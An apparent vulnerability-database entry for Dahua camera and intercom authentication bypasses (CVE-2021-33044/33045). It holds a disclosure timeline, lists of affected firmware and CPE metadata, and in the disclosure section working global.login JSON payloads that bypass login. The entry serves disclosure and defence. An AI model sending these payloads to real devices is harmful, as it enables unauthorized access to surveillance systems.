Search

Find a vulnerability

Search criteria Use this form to refine search results.
Full-text search supports keyword queries with ranking and filtering.
You can combine vendor, product, and sources to narrow results.
Enable “Apply ordering” to sort by date instead of relevance.

    45 vulnerabilities by dahuasecurity

    VAR-202109-1875

    Vulnerability from variot - Updated: 2024-01-19 23:24

    The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. plural Dahua The product contains authentication vulnerabilities.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Dahua Technology Multiple products offered by (CWE-287) vulnerabilities exist. In this vulnerability information, DHI-ASI7213Y-V3-T1 Based on the Information Security Early Warning Partnership, the impact on IPA Report to JPCERT/CC Coordinated with the developer. Reporter : Mitsui Bussan Secure Direction Co., Ltd.A remote third party can exploit the product by sending a specially crafted data packet. ID Authentication may be bypassed. Dahua IPC is a series of industrial computer of Dahua of China Dahua Company. Zhejiang Dahua Technology Co., Ltd. is a leading monitoring product supplier and solution service provider. [STX]

    Subject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045)

    Attack vector: Remote Authentication: Anonymous (no credentials needed) Researcher: bashis (2021) Limited Disclosure: September 6, 2021 Full Disclosure: October 6, 2021 PoC: https://github.com/mcw0/DahuaConsole

    -=[Dahua]=- Advisory: https://www.dahuasecurity.com/support/cybersecurity/details/957 Firmware: https://www.dahuasecurity.com/support/downloadCenter/firmware

    -=[Timeline]=- June 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@dahuatech.com) June 17, 2021: Sent reminder to Dahua PSIRT June 18, 2021: Asked IPVM for help to get in contact with Dahua June 18, 2021: Received ACK from IPVM, told they sent note to Dahua June 19, 2021: ACK received from Dahua PSIRT, asked for additional details June 19, 2021: Additional details including PoC sent June 21, 2021: ACK received, vulnerabilites confirmed June 23, 2021: Dahua PSIRT asked for "coordinated disclosure" June 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now June 24, 2021: Received CVE-2021-33044, I asked about the second CVE July 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for "coordinated disclosure" July 04, 2021: Confirmed "coordinated disclosure", once again July 05, 2021: Dahua PSIRT tried convince me for "Full Disclosure" for vendor only, and "Limited Disclosure" for outside world July 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before "Limited Disclosure" September 6, 2021. "Full Disclosure" will be October 6, 2021, August 30, 2021: Dahua PSIRT asked to read my "Limited Disclosure" note August 30, 2021: Sent my "Limited Disclosure" note September 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates September 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices September 2, 2021: Dahua PSIRT pointed oversea website, asked for what models I have so Dahua could release firmware September 2, 2021: Refused to provide details, as I do expect me to find firmware on their website September 3, 2021: Dahua PSIRT informed that R&D will upload updated firmware in batches September 6, 2021: Limited Disclosure October 6, 2021: Full Disclosure

    -=[NetKeyboard Vulnerability]=-

    CVE-2021-33044

    Vulnerability: "clientType": "NetKeyboard", Vulnerable device types: IPC/VTH/VTO (tested) Vulnerable Firmware: Those devices who do not support "NetKeyboard" functionality (older than June 2021) Protocol: DHIP and HTTP/HTTPS

    Details: Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence will simply bypass authentication.

    Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":}

    [Example] { "method": "global.login", "params": { "userName": "admin", "loginType": "Direct", "clientType": "NetKeyboard", "authorityType": "Default", "passwordType": "Default", "password": "Not Used" }, "id": 1, "session": 0 }

    -=[Loopback Vulnerability]=-

    CVE-2021-33045

    Vulnerability: "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local",

    Vulnerable device types: IPC/VTH/VTO/NVR/DVR (tested) Vulnerable Firmware: Firmware version older than beginning/mid 2020. Protocol: DHIP

    Details: Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence pretends that the login request comes from "loopback" and will therefore bypass legitimate authentication.

    Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":}

    [Example] Random MD5 with l/p: admin/admin { "method": "global.login", "params": { "userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", "authorityType": "Default", "passwordType": "Default", "password": "[REDACTED]" }, "id": 1, "session": 0 }

    Plain text with l/p: admin/admin { "method": "global.login", "params": { "userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", "authorityType": "Default", "passwordType": "Plain", "password": "admin" }, "id": 1, "session": 0 }

    [ETX]

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202109-1875",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ipc-hx5xxx",
            "scope": null,
            "trust": 1.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hx3xxx",
            "scope": null,
            "trust": 1.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hum7xxx",
            "scope": null,
            "trust": 1.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hum7xxx",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.820.0000000.5.r.210705"
          },
          {
            "model": "vto-75x95x",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "4.300.0000003.0.r.210714"
          },
          {
            "model": "vth-542xh",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "4.500.0000002.0.r.210715"
          },
          {
            "model": "tpc-sd2221",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.630.0000000.7.r.210707"
          },
          {
            "model": "tpc-bf2221",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.630.0000000.10.r.210707"
          },
          {
            "model": "vto-65xxx",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "4.300.0000004.0.r.210715"
          },
          {
            "model": "sd1a1",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.812.0000007.0.r.210706"
          },
          {
            "model": "sd6al",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.812.0000007.0.r.210706"
          },
          {
            "model": "sd50",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.812.0000007.0.r.210706"
          },
          {
            "model": "sd41",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.812.0000007.0.r.210706"
          },
          {
            "model": "tpc-bf5x21",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.630.0000000.8.r.210630"
          },
          {
            "model": "ipc-hx3xxx",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.800.0000000.29.r.210630"
          },
          {
            "model": "tpc-bf1241",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.630.0000000.6.r.210707"
          },
          {
            "model": "tpc-sd8x21",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.630.0000000.9.r.210706"
          },
          {
            "model": "sd22",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.812.0000007.0.r.210706"
          },
          {
            "model": "ipc-hx5xxx",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.820.0000000.18.r.210705"
          },
          {
            "model": "sd52c",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.812.0000007.0.r.210706"
          },
          {
            "model": "tpc-bf5x01",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.630.0000000.12.r.210707"
          },
          {
            "model": "tpc-pt8x21b",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.630.0000000.10.r.210701"
          },
          {
            "model": "sd22",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "tpc-bf1241",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "sd6al",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "sd41",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "sd50",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "sd1a1",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "sd52c",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dhi-asi7213y-v3-t1",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hx2xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "thermal tpc-sd2221",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ptz dome camera sd52c",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "thermal tpc-sd8x21",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ptz dome camera sd6al",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "thermal tpc-pt8x21b",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "thermal tpc-bf2221",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ptz dome camera sd49",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ptz dome camera sd1a1",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ptz dome camera sd50",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "vth542xh",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hx8xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "thermal tpc-bf5xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hx5 xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "thermal tpc-bf1241",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ptz dome camera sd22",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "vto65xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hx1xxx",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "vto75x95x",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "dahua",
            "version": "build time  but  2021  year  6  versions older than month"
          },
          {
            "model": "ipc",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hx3xxx versions which build time before june",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2021"
          },
          {
            "model": "hx5xxx versions which build time before june",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2021"
          },
          {
            "model": "hum7xxx versions which build time before june",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2021"
          },
          {
            "model": "vto75x95x versions which build time before june",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2021"
          },
          {
            "model": "vto65xxx versions which build time before june",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2021"
          },
          {
            "model": "vth542xh versions which build time before june",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2021"
          },
          {
            "model": "ptz dome camera sd1a1 versions which build time before june",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2021"
          },
          {
            "model": "sd22 versions which build time before june",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2021"
          },
          {
            "model": "sd49 versions which build time before june",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2021"
          },
          {
            "model": "sd50 versions which build time before june",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2021"
          },
          {
            "model": "sd52c versions which build time before june",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2021"
          },
          {
            "model": "sd6al versions which build time before june",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2021"
          },
          {
            "model": "thermal tpc-bf1241 versions which build time before june",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2021"
          },
          {
            "model": "tpc-bf2221 versions which build time before june",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2021"
          },
          {
            "model": "tpc-sd2221 versions which build time before june",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2021"
          },
          {
            "model": "tpc-bf5xxx versions which build time before june",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2021"
          },
          {
            "model": "tpc-sd8x21 versions which build time before june",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2021"
          },
          {
            "model": "tpc-pt8x21b versions which build time before june",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2021"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-103421"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-70816"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-012422"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2024-000007"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33044"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2.820.0000000.5.r.210705",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hum7xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hx3xxx_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2.800.0000000.29.r.210630",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hx3xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hx5xxx_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2.820.0000000.18.r.210705",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hx5xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:sd1a1_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2.812.0000007.0.r.210706",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:sd1a1:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:sd22_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2.812.0000007.0.r.210706",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:sd22:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:sd41_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2.812.0000007.0.r.210706",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:sd41:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:sd50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2.812.0000007.0.r.210706",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:sd50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:sd52c_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2.812.0000007.0.r.210706",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:sd52c:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:sd6al_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2.812.0000007.0.r.210706",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:sd6al:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:tpc-bf1241_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2.630.0000000.6.r.210707",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:tpc-bf1241:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:tpc-bf2221_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2.630.0000000.10.r.210707",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:tpc-bf2221:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:tpc-bf5x01_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2.630.0000000.12.r.210707",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:tpc-bf5x01:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:tpc-pt8x21b_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2.630.0000000.10.r.210701",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:tpc-pt8x21b:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:tpc-sd2221_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "2.630.0000000.7.r.210707",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:tpc-sd2221:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:tpc-sd8x21_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2.630.0000000.9.r.210706",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:tpc-sd8x21:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:vto-65xxx_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.300.0000004.0.r.210715",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:vto-65xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:vto-75x95x_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.300.0000003.0.r.210714",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:vto-75x95x:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:vth-542xh_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.500.0000002.0.r.210715",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:vth-542xh:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:tpc-bf5x21_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2.630.0000000.8.r.210630",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:tpc-bf5x21:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-33044"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "bashis",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "164423"
          }
        ],
        "trust": 0.1
      },
      "cve": "CVE-2021-33044",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
